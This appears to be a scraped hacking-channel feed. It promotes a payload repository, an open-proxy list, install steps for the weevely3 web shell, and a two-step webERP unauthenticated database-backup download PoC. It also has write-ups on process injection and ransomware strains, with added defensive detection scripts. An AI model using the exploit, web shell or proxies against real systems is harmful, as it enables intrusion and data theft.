UNDERCODE COMMUNITY
2.68K subscribers
1.23K photos
31 videos
2.65K files
80.3K links
🦑 Undercode Cyber World!
@UndercodeCommunity


1️⃣ World's first platform which collects & analyzes every new hacking method,
+ AI practice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
→ Undercode.help
▁ ▂ ▄ ｕ𝕟𝔻ⓔ𝐫Ć𝔬𝓓ⓔ ▄ ▂ ▁

🦑 A list of useful payloads and bypasses for Web Application Security and Pentest/CTF
fb.com/UndercodeTesting

🦑 FEATURES:

Methodology and Resources
Active Directory Attack.md
Cloud - AWS Pentest.md
Cloud - Azure Pentest.md
Cobalt Strike - Cheatsheet.md
Linux - Persistence.md
Linux - Privilege Escalation.md
Metasploit - Cheatsheet.md
Methodology and enumeration.md
Network Pivoting Techniques.md
Network Discovery.md
Reverse Shell Cheatsheet.md
Subdomains Enumeration.md
Windows - Download and Execute.md
Windows - Mimikatz.md
Windows - Persistence.md
Windows - Post Exploitation Koadic.md
Windows - Privilege Escalation.md
Windows - Using credentials.md
CVE Exploits

🦑 DOWNLOAD:
https://github.com/swisskyrepo/PayloadsAllTheThings



🦑 FRESH PREMIUM PROXIES:
instagram.com/undercodetesting

All entries were listed as checked "1 hour ago" at posting time. Columns: IP, port, latency, percentage (number of checks) as reported by the source, country code, country - city, anonymity level.

IP               Port  Latency  % (checks)  Location                              Type
103.209.65.12    6666  3752 ms  8% (68)     in India - Valsad                     Elite
113.254.104.207  80    851 ms   2% (73)     hk Hong Kong - Central                Elite
115.223.2.114    80    1268 ms  50% (48)    cn China - Wuhan                      Elite
186.229.25.18    8080  3966 ms  30% (75)    br Brazil - Rio de Janeiro            Elite
190.210.8.93     8080  3592 ms  7% (66)     ar Argentina - Buenos Aires           Elite
191.241.34.222   8089  3945 ms  25% (33)    br Brazil - Caucaia                   Elite
203.218.82.122   8080  766 ms   44% (50)    hk Hong Kong - Central                Elite
223.68.190.130   8181  2639 ms  39% (60)    cn China - Yangzhou                   Elite
43.224.8.14      6666  3591 ms  8% (75)     in India - Vadodara                   Elite
47.89.193.30     8118  147 ms   2% (70)     us United States - San Mateo          Elite
149.28.180.233   8081  1607 ms  79% (19)    us United States                      Elite
167.99.166.194   8081  1356 ms  6% (91)     us United States - Santa Clara        Elite
170.254.150.166  80    2523 ms  59% (46)    br Brazil                             Elite
167.71.198.204   8080  1810 ms  84% (50)    us United States                      Elite
181.118.167.104  80    721 ms   98% (43)    cl Chile - Santiago                   Elite
182.23.81.82     3128  3245 ms  19% (72)    id Indonesia - Jakarta                Elite
185.10.166.130   8080  4166 ms  20% (66)    gb United Kingdom - London            Elite
103.141.180.130  8080  3554 ms  16% (66)    id Indonesia                          Elite
103.216.82.199   6666  3984 ms  9% (83)     in India - Ahmedabad                  Elite
118.25.35.202    9999  2175 ms  34% (60)    cn China                              Elite
122.233.234.32   8118  2756 ms  36% (50)    cn China                              Elite
123.252.173.162  80    4373 ms  20% (68)    in India                              Elite
134.249.141.148  80    3517 ms  21% (74)    ua Ukraine - Lviv                     Elite
140.227.238.18   1000  2500 ms  20% (66)    jp Japan                              Elite
35.222.208.56    3128  762 ms   80% (50)    us United States                      Elite
36.55.230.146    8888  2511 ms  20% (80)    jp Japan - Kanazawa                   Elite
31.131.67.14     8080  3489 ms  15% (68)    ru Russia - Moscow                    Elite
52.161.188.148   80    332 ms   100% (16)   us United States                      Elite
52.163.87.222    8080  1253 ms  88% (16)    sg Singapore                          Elite
78.46.40.154     8118  1190 ms  16% (75)    de Germany - Nuremberg                Elite
79.137.123.252   3131  774 ms   8% (76)     fr France                             Elite
79.137.44.85     3129  2379 ms  65% (67)    es Spain - Madrid                     Elite
82.119.170.106   8080  882 ms   85% (53)    de Germany - Berlin                   Elite
85.90.215.111    3128  3012 ms  27% (65)    ua Ukraine - Kharkiv                  Elite
84.42.247.101    3128  3790 ms  25% (68)    cz Czech Republic - Prague            Elite

@uNDERCODEtESTING

🦑 Updated weaponized web shell
pinterest.com/Undercode_Testing

🦑 FEATURES:

Shell access to the target
SQL console pivoting on the target
HTTP/HTTPS proxy to browse through the target
Upload and download files
Spawn reverse and direct TCP shells
Audit remote target security
Port scan pivoting on target
Mount the remote filesystem
Bruteforce SQL accounts pivoting on the target

πŸ¦‘π•€β„•π•Šπ•‹π”Έπ•ƒπ•ƒπ•€π•Šπ”Έπ•‹π•€π•†β„• & β„π•Œβ„• :

1) git clone https://github.com/epinna/weevely3.git

2) cd weevely3

3) Make sure that the Python package manager (pip) and the YAML library are installed:

4) $ sudo apt-get install -y python3 python3-pip curl

5) $ cd weevely3/  (only needed if you are not already inside the cloned directory)

6) $ sudo pip3 install -r requirements.txt --upgrade

🦑 OS X

OS X requires Python 3 to be installed on the system. Run the following commands to install the gnureadline Python package manually:

$ sudo pip3 install gnureadline
$ cd weevely3/
$ sudo pip3 install -r requirements.txt --upgrade

@uNDERCODEtESTING

🦑 2020 EXPLOIT VERIFIED BY UNDERCODERS:

# Exploit Title: webERP 4.15.1 - Unauthenticated Backup File Access
# Date: 2020-05-01
# Author: Besim ALTINOK
# Software Link: https://sourceforge.net/projects/web-erp/
# Version: v4.15.1
# Tested on: Xampp
# Credit: İsmail BOZKURT

--------------------------------------------------------------------------
About Software:

webERP is a complete web-based accounting and business management system
that requires only a web-browser and pdf reader to use. It has a wide range
of features suitable for many businesses particularly distributed
businesses in wholesale, distribution, and manufacturing.

-------------------------------------------------------
PoC Unauthenticated Backup File Access
---------------------------------------------

1- This file generates a new backup file:
http://localhost/webERP/BackUpDatabase.php
2- Someone can then download the backup file from:
http://localhost/webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz
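A defender-side check for this issue, added here as an illustration and not part of the advisory above: Python that scans web-server access-log lines in the common "combined" format for the two paths the advisory names, and correlates a request to BackUpDatabase.php with a subsequent successful fetch of a dump under companies/<name>/ by the same client. The log lines, the client addresses (documentation ranges) and the ten-minute correlation window are constructed for the example.

```python
import re
from datetime import datetime, timedelta

# Apache/nginx "combined" access-log format.
LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

# The two paths from the advisory: the script that creates a dump, and the
# directory the dump lands in (Backup_<timestamp>.sql.gz is the advisory's name).
BACKUP_SCRIPT = re.compile(r"/BackUpDatabase\.php$", re.I)
BACKUP_FILE = re.compile(r"/companies/[^/]+/Backup_[\d-]+\.sql\.gz$", re.I)

# Constructed sample log (documentation IPs, advisory's timestamp).
SAMPLE_LOG = [
    '198.51.100.7 - - [01/May/2020:16:50:02 +0300] "GET /webERP/index.php HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/May/2020:16:55:35 +0300] "GET /webERP/BackUpDatabase.php HTTP/1.1" 200 843',
    '203.0.113.5 - - [01/May/2020:16:56:10 +0300] '
    '"GET /webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz HTTP/1.1" 200 1048576',
    '198.51.100.7 - - [01/May/2020:17:30:00 +0300] '
    '"GET /webERP/companies/weberp/Backup_2020-05-01-16-55-35.sql.gz HTTP/1.1" 404 231',
]


def parse_line(line):
    """Parse one combined-format line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    d = m.groupdict()
    d["ts"] = datetime.strptime(d["ts"], TS_FMT)
    d["status"] = int(d["status"])
    return d


def find_backup_exposure(lines, window=timedelta(minutes=10)):
    """Return findings as (severity, client_ip, reason, path) tuples.

    A client that triggers the backup script and then successfully fetches a
    dump within `window` is flagged 'critical'; either event alone is still
    reported so an analyst can review it.
    """
    events = [e for e in (parse_line(l) for l in lines) if e]
    findings = []
    triggered = {}  # client ip -> time of its last BackUpDatabase.php request
    for e in events:
        path = e["path"].split("?", 1)[0]  # drop any query string before matching
        if BACKUP_SCRIPT.search(path):
            triggered[e["ip"]] = e["ts"]
            findings.append(("medium", e["ip"], "backup generation requested", path))
        elif BACKUP_FILE.search(path) and e["status"] == 200:
            t0 = triggered.get(e["ip"])
            if t0 is not None and e["ts"] - t0 <= window:
                findings.append(("critical", e["ip"], "dump generated and downloaded", path))
            else:
                findings.append(("high", e["ip"], "dump downloaded", path))
    return findings


if __name__ == "__main__":
    for f in find_backup_exposure(SAMPLE_LOG):
        print(*f)
```

Only successful (200) downloads are counted; the 404 in the sample is a failed attempt and is ignored, though a real triage would also want to see repeated guesses at Backup_* names. The complementary fix on the server side is to keep generated dumps outside the web root, or to deny direct web access to the companies/ directory, so that the download in step 2 fails even when the script is reachable.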


@UndercodeTesting

🦑 Real-world examples of process injection in action
DoublePulsar tutorial:
t.me/UndercodeTesting

🦑 LET'S START:


> An analysis of the kernel mode payload of the famous DoublePulsar code by F-Secure revealed that it utilizes a form of DLL injection to load a DLL into a target process (in this case, lsass.exe) using an Asynchronous Procedure Call (APC). It did not utilize the standard Windows API commands such as LoadLibrary and did not write the DLL to disk, making it stealthier.

1) Cobalt Strike
Cobalt Strike is a penetration testing software that was designed to execute targeted attacks and emulate the post-exploitation actions of advanced threat actors through a listener called a beacon.

2) Cobalt Strike commands such as keylogger, screenshot and so on were designed to be injected into another process in order to work. The listener is injected into a specific process (a personal favorite is explorer.exe because the process is always running in a GUI environment) and the keystroke logger will monitor all keystrokes via the infected process. It then reports them to the beacon console without writing to disk. This only stops when the process terminates or the keystroke logger job is terminated by the user.

3) Lazarus Group
The Lazarus Group (also known as “Hidden Cobra”) is a threat group headquartered in North Korea whose malicious activities span multiple years, as far back as 2009. Since 2016, the group has been conducting “FASTCash” attacks, stealing money from ATMs of target banks in Africa and Asia. The target bank’s network is compromised and a malware known as Trojan.Fastcash is deployed on the network.

> An analysis of the malware reveals that malicious Advanced Interactive eXecutive (“AIX”) executable files are injected into legitimate processes on the payment application servers used in handling ATM transactions. The executable allows the group to monitor, intercept and generate responses to fraudulent transaction requests using fake ISO 8583 (the standard used for financial transaction messaging) messages. This allows attempts to withdraw cash via an ATM to be successful.

4) APT41
APT41 is a threat group headquartered in China and known for carrying out Chinese state-sponsored espionage campaigns dating as far back as 2012.

> The group is known for its software supply chain attacks, where TTPs developed from accessing video game production environments are utilized. These TTPs are used to compromise software companies, and malicious code is injected into software updates distributed to victim organizations.

5) WINTERLOVE is a backdoor used by the group to load and execute remote code in a running process (e.g., iexplorer.exe) and can be used to enumerate system files and directories.

6) Mitigation/prevention
DLL injection is not necessarily a bad technique, as many applications use it for legitimate purposes; for example, Antivirus/Endpoint Detection and Response (“EDR”) solutions inject their own code/agents into running processes in order to monitor the process and detect abnormal activities. This makes malicious injection hard to detect, especially since it runs under a legitimate process.

7) Behavior analysis
This method can be achieved by configuring your EDRs to detect cross-process events such as injection of code into a running process, duplicate processes running, remote threads and so on.

8) EDRs work by gathering, monitoring and analyzing endpoint activities/events. This gives the security team the necessary visibility to carry out further analysis, detection, investigation and mitigation of advanced cyber threats across all endpoints running an EDR.

As part of their response capabilities, EDRs can be configured to block certain types of process injection, depending on the behavior that occurs during the injection process.
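Worked example of the behavior analysis described above, added here as an illustration and not taken from the original post or from any EDR product: a small Python triage function over constructed Sysmon-style events. It uses Sysmon's real event IDs 8 (CreateRemoteThread) and 10 (ProcessAccess) and Windows' documented process access rights, flags a thread created in another process or a handle to lsass.exe with read or write rights, and applies the caveat from the text by skipping self-targeting events and an allowlisted AV/EDR agent. The agent path C:\Program Files\ExampleEDR\edrsvc.exe, the user names and the event values are assumptions made up for the example.

```python
import ntpath

# Sysmon event IDs for the cross-process events discussed in the text
# (real IDs; the field names below follow Sysmon's schema).
CREATE_REMOTE_THREAD = 8
PROCESS_ACCESS = 10

# Windows process access rights relevant to injection and memory reading.
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_OPERATION = 0x0008
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
INJECT_MASK = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_WRITE

# Targets where a foreign thread is a strong signal: lsass.exe (DoublePulsar)
# and explorer.exe (Cobalt Strike's keylogger) come from the text.
SENSITIVE_TARGETS = {"lsass.exe", "explorer.exe", "winlogon.exe"}

# Directories a normal user can write to; code launched from here rarely has a
# legitimate reason to touch other processes.
USER_WRITABLE = ("\\users\\", "\\temp\\", "\\appdata\\", "\\downloads\\")

# The caveat from the text: AV/EDR agents inject legitimately. Constructed
# placeholder path; a real deployment would list its own vendor's binaries.
ALLOWLIST = {r"c:\program files\exampleedr\edrsvc.exe"}

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    # A process touching itself is never cross-process: ignored.
    {"EventID": 8, "SourceImage": r"C:\Windows\System32\svchost.exe",
     "TargetImage": r"C:\Windows\System32\svchost.exe", "StartAddress": "0x7FF8A1B20000"},
    # A binary dropped in a temp folder starts a thread inside explorer.exe.
    {"EventID": 8, "SourceImage": r"C:\Users\alice\AppData\Local\Temp\update.exe",
     "TargetImage": r"C:\Windows\explorer.exe", "StartAddress": "0x00000203E5A20000"},
    # The allowlisted EDR agent opening lsass.exe: expected, suppressed.
    {"EventID": 10, "SourceImage": r"C:\Program Files\ExampleEDR\edrsvc.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1FFFFF"},
    # An unknown tool in Downloads opens lsass.exe with VM_READ rights.
    {"EventID": 10, "SourceImage": r"C:\Users\alice\Downloads\tool.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    # Task Manager querying another process with limited rights: ignored.
    {"EventID": 10, "SourceImage": r"C:\Windows\System32\Taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\notepad.exe", "GrantedAccess": "0x1000"},
]


def _base(path):
    return ntpath.basename(path).lower()


def classify(event):
    """Return (severity, event_id, source, target, reason) or None if benign."""
    src, dst = event["SourceImage"], event["TargetImage"]
    if src.lower() == dst.lower() or src.lower() in ALLOWLIST:
        return None
    eid = event["EventID"]
    from_user_dir = any(d in src.lower() for d in USER_WRITABLE)
    if eid == CREATE_REMOTE_THREAD:
        sev = "critical" if (_base(dst) in SENSITIVE_TARGETS or from_user_dir) else "high"
        return (sev, eid, src, dst, "remote thread created in another process")
    if eid == PROCESS_ACCESS:
        mask = int(event["GrantedAccess"], 16)
        if mask & INJECT_MASK:
            return ("high", eid, src, dst, "handle with write/thread rights")
        if _base(dst) == "lsass.exe" and mask & PROCESS_VM_READ:
            return ("high", eid, src, dst, "memory-read handle to lsass.exe")
    return None


def detect(events):
    """Run classify() over a batch of events and keep only the findings."""
    return [f for f in map(classify, events) if f]


if __name__ == "__main__":
    for finding in detect(SAMPLE_EVENTS):
        print(*finding)
```

The allowlist is keyed on a path only to keep the example short; in a real deployment it should be keyed on code-signing identity, since a path can be reused by anything that can write to it. Expect tuning: debuggers, crash handlers and some installers also create remote threads, which is why the text frames this as behavior analysis rather than a single hard rule.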

@UndercodeTesting
🦑 PAID PDF COLLECTIONS

🦑 MOST ACTIVE RANSOMWARE 2019-2020:
T.me/UndercodeTesting


1) STOP (DJVU)
The STOP ransomware strain, also known as DJVU, has been submitted to the ID Ransomware tool over 75,000 times, which only represents a sliver of the systems it may have affected worldwide.

STOP affects the systems of home users and can easily be picked up by downloading unsafe files from torrent sites. Once the infection begins, the STOP malware uses AES-256 encryption to lock the system's files, followed by a payment demand issued to the user. It is by far the most common submission to ID Ransomware, accounting for 56 percent of all submissions.

2) Dharma
The Dharma variant not only locks a system but also instructs the victim to contact a specific email address, where they are expected to negotiate the release of their files. Dharma is a cryptovirus which is pushed onto systems via malicious download links and email hyperlinks.

Operating in the threat landscape since 2016, Dharma is part of the .cezar family. It mainly targets enterprises. Dharma accounted for 12 percent of submissions.

3) Phobos
Phobos, named either after the Martian moon or its namesake the Greek god of fear, is a ransomware variant that makes up 8.9 percent of all submissions.

It is mainly spread via exploitation of insufficiently secured Remote Desktop Protocol ports. Phobos has been seen in the wild attacking corporations and public bodies indiscriminately. In a similar manner to Dharma, this ransomware locks your files and then requests that you contact the attacker directly to negotiate their release.

4) GlobeImposter
GlobeImposter makes up 6.5 percent of all submissions to the ID Ransomware tool. GlobeImposter is the next evolution of previous strains of the variant. What makes it different is that it uses AES-256 cryptography to encrypt a victim’s files before it issues a bitcoin payment demand.

5) REvil
REvil, also known as Sodinokibi, was first discovered in 2019, and security researchers believe that it was developed by the same threat actors who created GandCrab.

Emsisoft notes that Sodinokibi is seen as a “Ransomware-as-a-service that relies on affiliates to distribute and market the ransomware. It is extremely evasive and uses advanced techniques to avoid being detected by security software.”

The attack vectors for this variant include exploiting a vulnerability in Oracle WebLogic and more traditional methods such as phishing campaigns. It makes up 4.5 percent of submissions.

The ransomware 2019 threat landscape is woefully vibrant as hackers continue to see value in targeting enterprises, public bodies and governments.
(Figure: Countries most affected by ransomware. Credit: Emsisoft)

6) GandCrab
According to Europol the GandCrab ransomware variant has infected nearly half a million victim systems since it was first detected at the start of 2018. It accounts for 3.6 percent of submissions.

The GandCrab virus infects and encrypts all the files within a user’s system. Originally the ransomware was distributed via exploit kits such as RIG EK and GrandSoft EK. Cybersecurity company Bitdefender has created a useful decryption tool to help mitigate GandCrab lock-outs.

7) Magniber
Magniber has been around in one form or another since 2013, but it still accounts for 3.3 percent of submissions.

Cybersecurity firm Malwarebytes has been tracking this variant for some time and has noticed that it is continually evolving. Of one of the latest versions they state: “Each file is encrypted with a unique key—the same plaintext gives a different ciphertext. The encrypted content has no patterns visible. That suggests that a stream cipher or a cipher with chained blocks was used (probably AES in CBC mode).”
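Worked example of the inference in the quote above, added here as an illustration and not taken from the original article or from Malwarebytes: the repeated-block check an analyst runs over an encrypted file to decide whether a block cipher was used in ECB mode (identical plaintext blocks give identical ciphertext blocks, so patterns survive) or in a chained or stream mode (no repeats). AES itself is not implemented; a keyed SHA-256 function stands in for the block cipher, an assumption that keeps the one property the check relies on, namely that equal input blocks give equal outputs under the same key. The code goes slightly beyond the quote by contrasting ECB with CBC chaining side by side over a repetitive plaintext.

```python
import hashlib
import os
from collections import Counter

BLOCK = 16  # AES block size in bytes


def _prf(key, block):
    """Stand-in for a block cipher: a keyed pseudorandom function from SHA-256.
    It is NOT AES and is not decryptable; it only reproduces the property that
    matters here (same key + same input block -> same output block)."""
    return hashlib.sha256(key + block).digest()[:BLOCK]


def _pad(data):
    """PKCS#7 padding to a whole number of blocks."""
    n = BLOCK - len(data) % BLOCK
    return data + bytes([n]) * n


def encrypt_ecb(key, data):
    """Each block processed independently: repeats in plaintext show in ciphertext."""
    data = _pad(data)
    return b"".join(_prf(key, data[i:i + BLOCK]) for i in range(0, len(data), BLOCK))


def encrypt_cbc(key, data, iv):
    """Each block XORed with the previous ciphertext block before processing,
    so equal plaintext blocks no longer give equal ciphertext blocks. The IV is
    prepended, as is usual for CBC output."""
    data = _pad(data)
    out, prev = [], iv
    for i in range(0, len(data), BLOCK):
        block = bytes(a ^ b for a, b in zip(data[i:i + BLOCK], prev))
        prev = _prf(key, block)
        out.append(prev)
    return iv + b"".join(out)


def repeated_block_ratio(ciphertext, block=BLOCK):
    """Fraction of blocks that duplicate an earlier block. Near 0 for CBC, CTR
    or stream-cipher output; high for ECB over repetitive input such as a
    zero-filled region or an uncompressed image."""
    blocks = [ciphertext[i:i + block] for i in range(0, len(ciphertext) - block + 1, block)]
    if not blocks:
        return 0.0
    dup = sum(c - 1 for c in Counter(blocks).values())
    return dup / len(blocks)


def likely_ecb(ciphertext, threshold=0.05):
    """The analyst's verdict: visible block repetition points at ECB."""
    return repeated_block_ratio(ciphertext) > threshold


def demo():
    """Encrypt 4 KiB of zero bytes (a constructed, highly repetitive input)
    both ways and return the two repeated-block ratios."""
    key = os.urandom(16)
    plaintext = b"\x00" * 4096
    ecb = encrypt_ecb(key, plaintext)
    cbc = encrypt_cbc(key, plaintext, os.urandom(16))
    return repeated_block_ratio(ecb), repeated_block_ratio(cbc)


if __name__ == "__main__":
    ecb_ratio, cbc_ratio = demo()
    print(f"ECB repeated-block ratio: {ecb_ratio:.3f}")
    print(f"CBC repeated-block ratio: {cbc_ratio:.3f}")
```

The check is only informative on repetitive plaintext: over already-compressed data (archives, media) ECB also shows few repeats, which is why analysts run it against files with long runs of identical bytes. Absence of repeats rules ECB out but, as the quote says, cannot distinguish CBC from a stream cipher; that needs other evidence, such as the per-file IV or key material the sample writes alongside the ciphertext.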

8) Scarab
The Scarab ransomware was first discovered in June 2017. The malicious software uses the encryption algorithms AES-256 and RSA-2048 to lock the files on a targeted system. It makes up 2.0 percent of submissions.
Cyber security firm Symantec notes that: “Many of Scarab’s campaigns focus on distributing the group’s custom malware (Trojan.Scieron and Trojan.Scieron.B) through emails with malicious attachments. These files contain exploits that take advantage of older vulnerabilities that are already patched by vendors. If the attackers successfully compromise the victims’ computers, then they use a basic back door threat called Trojan.Scieron to drop Trojan.Scieron.B onto the computer.”

9) Rapid
Rapid accounts for 1.8 percent of submissions. It is ransomware that acts as a Trojan horse to encrypt files and then demand a ransom.

Rapid burst onto the scene in 2018. When it infects a system it removes all of the Windows shadow volume copies, stops all database processes and takes automatic repair offline. Once files are encrypted, like the others it issues a ransom demand.

10) Troldesh
Troldesh, also known as Shade, accounts for 1.4 percent of submissions. Troldesh is a Trojan horse that locks files in a system via an encryption method. The malware has been around since 2014 but is still used in many active ransomware campaigns.

@UndercodeTesting